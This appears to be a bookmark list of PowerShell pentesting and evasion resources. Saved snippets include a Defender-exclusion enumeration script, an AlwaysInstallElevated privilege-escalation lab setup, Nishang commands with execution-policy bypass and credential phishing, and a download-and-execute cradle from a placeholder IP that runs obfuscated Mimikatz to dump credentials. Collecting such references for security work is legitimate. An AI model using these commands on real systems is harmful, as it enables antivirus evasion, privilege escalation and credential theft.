14 results tagged powershell
  • Abusing Exclusions To Evade Detection | Dazzy Ddos
    function Get-DefenderExclusions {
        param (
            [string]$logName = "Microsoft-Windows-Windows Defender/Operational",
            [int]$eventID = 5007,
            [switch]$Path,
            [switch]$Process,
            [switch]$Extension
        )
    
        if (-not ($Path -or $Process -or $Extension)) {
            Write-Host "Please specify at least one type of exclusion to filter: -Path, -Process, -Extension."
            return
        }
    
        # Get all event logs with the specified Event ID
        $events = Get-WinEvent -LogName $logName -FilterXPath "*[System[(EventID=$eventID)]]" -ErrorAction SilentlyContinue
    
        if (-not $events) {
            Write-Host "No events found with Event ID $eventID in the $logName log."
            return
        }
    
        # Define the regex patterns for exclusion paths, extensions, and processes
        $patterns = @{
            Path = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\([^`"]+)"
            Extension = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Extensions\\([^`"]+)"
            Process = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\\([^`"]+)"
        }
    
        # Function to parse and return unique exclusions
        function Get-UniqueExclusions {
            param (
                [string]$pattern,
                [string]$exclusionType
            )
    
            $uniqueExclusions = @{}
            foreach ($event in $events) {
                $message = $event.Message
                if ($message -match $pattern) {
                    $exclusionDetail = $matches[1] -replace ' = 0x0.*$', '' -replace 'New value:', '' -replace '^\s+|\s+$', ''
                    if (-not $uniqueExclusions.ContainsKey($exclusionDetail) -or $event.TimeCreated -gt $uniqueExclusions[$exclusionDetail]) {
                        $uniqueExclusions[$exclusionDetail] = $event.TimeCreated
                    }
                }
            }
            return $uniqueExclusions.GetEnumerator() | Sort-Object Value -Descending | ForEach-Object {
                [PSCustomObject]@{
                    ExclusionDetail = $_.Key
                    TimeCreated = $_.Value
                }
            }
        }
    
        # Extract and display exclusions based on the provided arguments
        if ($Path) {
            Write-Host "Path Exclusions:"
            Get-UniqueExclusions -pattern $patterns.Path -exclusionType 'Path' | Format-Table -Property ExclusionDetail, TimeCreated -AutoSize -Wrap
        }
        if ($Process) {
            Write-Host "Process Exclusions:"
            Get-UniqueExclusions -pattern $patterns.Process -exclusionType 'Process' | Format-Table -Property ExclusionDetail, TimeCreated -AutoSize -Wrap
        }
        if ($Extension) {
            Write-Host "Extension Exclusions:"
            Get-UniqueExclusions -pattern $patterns.Extension -exclusionType 'Extension' | Format-Table -Property ExclusionDetail, TimeCreated -AutoSize -Wrap
        }
    }
    
    # Example usage:
    # Get-DefenderExclusions -Path -Process -Extension
    # Get-DefenderExclusions -Process
    August 12, 2025 at 12:45:27 PM UTC
    - https://dazzyddos.github.io/posts/Abusing_Exclusions_To_Evade_Detection/
    powershell defender evasion evade
  • The Most Helpful PowerShell Cheat Sheet You’ll Ever Find
    July 31, 2025 at 9:53:27 AM UTC
    - https://www.stationx.net/powershell-cheat-sheet/
    powershell
  • Note: Setup vuln alwaysinstallelevated

    # Lab setup: the policy takes effect only when it is set in both HKCU and HKLM
    $RegistryPath1 = 'HKCU:\Software\Policies\Microsoft\Windows\Installer'
    $RegistryPath2 = 'HKLM:\Software\Policies\Microsoft\Windows\Installer'
    $Name = 'AlwaysInstallElevated'
    $Value = '1'

    # Create the key if it does not exist
    # (New-Item -Force on an existing registry key would recreate it and drop its values)
    if (-not (Test-Path $RegistryPath1)) { New-Item -Path $RegistryPath1 -Force | Out-Null }
    if (-not (Test-Path $RegistryPath2)) { New-Item -Path $RegistryPath2 -Force | Out-Null }

    # Now set the value
    New-ItemProperty -Path $RegistryPath1 -Name $Name -Value $Value -PropertyType DWORD -Force
    New-ItemProperty -Path $RegistryPath2 -Name $Name -Value $Value -PropertyType DWORD -Force

    April 2, 2022 at 9:44:06 PM UTC
    - https://shaarli.onemask.me/?-WEM-A
    alwaysinstallelevated msi windows privesc powershell
  • Exploit Monday: 5/13/12 - 5/20/12
    February 22, 2022 at 2:37:44 PM UTC
    - https://web.archive.org/web/20210126074234/http://www.exploit-monday.com/2012_05_13_archive.html
    osce delegate reflections powershell assembly
  • PowerShell load .Net Assembly - PsCustom Object - Hitchikers GUID(e) to Automation
    July 20, 2021 at 9:50:46 AM UTC
    - https://pscustomobject.github.io/powershell/howto/PowerShell-Add-Assembly/
    loading assembly powershell c# cs
  • klezVirus/chameleon: PowerShell Script Obfuscator
    June 3, 2021 at 1:29:19 PM UTC
    - https://github.com/klezVirus/chameleon
    obfuscation powershell
  • SANS Penetration Testing | Pen Test Poster: "White Board" - PowerShell - Built-in Port Scanner! | SANS Institute
    June 17, 2020 at 9:35:48 AM UTC
    - https://www.sans.org/blog/pen-test-poster-white-board-powershell-built-in-port-scanner/
    powershell portscan nmap port scanner
  • Embedding EXE files into PowerShell scripts
    May 25, 2020 at 8:24:03 PM UTC
    - https://truesecdev.wordpress.com/2016/03/15/embedding-exe-files-into-powershell-scripts/
    powershell obfuscation binary av bypass evasion
  • Poking Holes in the Firewall: Egress Testing With AllPorts.Exposed - Black Hills Information Security
    May 25, 2020 at 5:54:24 PM UTC
    - https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/
    egress traffic powershell
  • How to create dump files remotely (ProcDump) using PowerShell? - Powershellbros.com
    October 22, 2019 at 9:52:42 AM UTC
    - https://www.powershellbros.com/how-to-create-dump-files-remotely-procdump-using-powershell/
    procdump mimikatz remote hacking pentest powershell script scripting redteam
  • PowerUp: A Usage Guide – harmj0y
    March 31, 2019 at 7:04:32 PM UTC
    - https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/
    powerup powershell windows exploitation post hacking pentest
  • Nishang: A Post-Exploitation Framework

    Port-Scan

    Powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Port-Scan.ps1'; Port-Scan -StartAddress 192.168.56.101 -Endaddress 192.168.56.105 -ResolveHost -ScanPort }"

    Remove-Update

    Powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Remove-Update.ps1'; Remove-Update KB2534366}"

    Invoke-CredentialsPhish

    Powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1'; Invoke-CredentialsPhish}"

    February 20, 2019 at 11:00:59 PM UTC
    - https://resources.infosecinstitute.com/nishang-a-post-exploitation-framework/
    nishang scripts tool windows post exploitation postex postexploitation hacking pentest powershell
  • Pwning the Enterprise With PowerShell

    PowerMeta - Discover publicly available files, extract metadata, provide information about internal username schema, system names, domain info ... https://github.com/dathack/PowerMeta
    MailSniper, powercat, empire, unicorn, dnscat2-powershell, invoke-powershellicmp, ...

    February 20, 2019 at 10:17:58 PM UTC
    - https://fr.slideshare.net/dafthack/pwning-the-enterprise-with-powershell
    powersploit powershell windows exploitation post postex postexploitation tools mimikatz powermeta mailsniper empire unicorn
  • geoda: Running an Obfuscated version of Mimikatz in Memory to bypass AntiVirus and other host based controls

    https://github.com/danielbohannon/Invoke-Obfuscation

    PS > Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation
    Invoke-Obfuscation > set SCRIPTBLOCK "iEX (New-Object System.Net.WebClient).DownloadString('https://<IP>:<PORT>/obfuscated.ps1'); Invoke-Mimidogz -DumpCred
    ...
    February 20, 2019 at 2:24:52 PM UTC
    - https://blog.geoda-security.com/2018/05/running-obfuscated-version-of-mimikatz.html
    powershell mimikatz postexploitation postex post exploitation obfuscation kiwi